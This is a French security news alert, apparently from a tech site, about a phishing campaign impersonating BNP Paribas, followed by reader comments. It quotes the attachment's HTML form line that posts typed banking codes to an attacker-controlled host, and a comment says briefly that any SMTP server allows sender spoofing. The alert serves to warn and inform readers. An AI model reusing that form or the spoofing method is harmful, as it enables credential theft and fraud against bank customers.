Alerte phishing – Depuis presque 24 heures, les envois de mails s’enchaînent et les escrocs se sont bien débrouillés pour avoir un mail à l’image de la banque BNP Paribas. Prudence !
Les multiples tentatives de hameçonnage de ces dernières heures visant la banque BNP Paribas se sont faites remarquées par un grand nombre d’internautes. En effet, le mail est plutôt bien présenté, aux couleur de la banque et dans un français correct. Il titre “BNP Paribas – Mesure De Sécurité“.
Seul détail, une erreur sur le nom de la banque dans le contenu du mail : le pirate parler de Crédit Mutuel au lieu de BNP Paribas… sans commentaire.
Le mail d’envoi semble correct car il a été falsifié lors de l’envoi : service@bnpparibas.net. Le pirate n’a pas hésité à inventer le “Service CyberBNP” pour signer le mail ! Pas de lien direct dans le contenu du mail, le piège se situe en pièce jointe, dans un fichier HTML à télécharger (certificat_bnp.htm), affichant un formulaire aux couleur de la banque et invitant à saisir ses codes confidentiels :
Tout paraît normal sauf que si l’on regarde la source de la page, on remarque cette ligne, qui envoi les données confidentielles saisies directement au pirate : <form method=”post” name=”logincanalnet” action=”http://bnpparibas.scieron.com:89/lok.php”>.
Au passage, scieron.com s’avère être un service DynDNS permettant rediriger facilement un sous domaine vers un espace Web personnel. Pour une fois, le pirate n’a donc pas utilisé un site Web piraté pour y déposer son kit de phishing.
Merci UnderNews 🙂
bonjour,
je me demande bien comment ils arrivent à envoyer des tonnes de mails tout en fascifiant le mail d’envoi comme iindique dans l’article? et ça bypass meme les anti spams
Bonjour,
C’est simple, tout d’abord une grosse liste de mails (qualifiés ou pas) puis un serveur SMTP lambda. Tout SMTP peut permettre l’usurpation de mail à l’envoi.
Ensuite, votre dernière affirmation est fausse, beaucoup de personnes l’ont reçu en spam 😉
Les commentaires sont fermés.